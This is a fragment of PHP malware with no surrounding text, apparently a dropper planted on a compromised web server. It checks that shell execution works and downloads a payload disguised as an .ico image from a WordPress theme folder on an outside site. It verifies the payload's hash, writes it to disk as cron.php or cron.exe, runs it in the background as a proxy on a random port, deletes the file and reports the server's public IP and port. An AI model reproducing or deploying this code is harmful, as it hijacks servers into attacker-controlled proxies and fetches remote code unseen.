"windows")); exit(); } $res = exec("echo 'me8ynbv2hcdrefgyh'"); if (strpos($res, "me8ynbv2hcdrefgyh") === FALSE) { echo serialize(array("error" => "no exec")); exit(); } function get_data($url) { $contents = false; $errs = 0; while (!$contents && ($errs++ < 3)) { $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'; if (is_callable('curl_init')) { $c = curl_init($url); curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); curl_setopt($c, CURLOPT_USERAGENT, $user_agent); $contents = curl_exec($c); if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) $contents = false; curl_close($c); } else { $allowUrlFopen = preg_match('/1|yes|on|true/i', ini_get('allow_url_fopen')); if ($allowUrlFopen) { $options = array('http' => array('user_agent' => $user_agent)); $context = stream_context_create($options); $contents = @file_get_contents($url, false, $context); } } } return $contents; } if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { exit(); $proxy_payload = get_data("http://www.sokolochrona.pl/wp-content/themes/Divi/images/win_sicon.ico"); $proxy_path = "cron.exe"; } else { $proxy_payload = get_data("http://www.sokolochrona.pl/wp-content/themes/Divi/images/sicon.ico"); $sum = "b2180f899d49985eb0e384b820f9dd84"; $proxy_path = "cron.php"; if (strcmp(md5($proxy_payload), $sum) !== 0) { exit(); } } $port = mt_rand(1025, 65000); @file_put_contents($proxy_path, $proxy_payload); @chmod($proxy_path, 0755); if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { @pclose(@popen('start /B ./$proxy_path -e0.0.0.0 -p$port 2>nul >nul', "r")); } else { @exec("./$proxy_path -e0.0.0.0 -p$port > /dev/null 2>&1 &"); } @unlink($proxy_path); echo serialize(Array("hosts"=>Array(get_data("http://api.ipify.org/"), $_SERVER["HTTP_HOST"], ), "port"=>$port, "login"=>"", "passwd"=>"")); exit();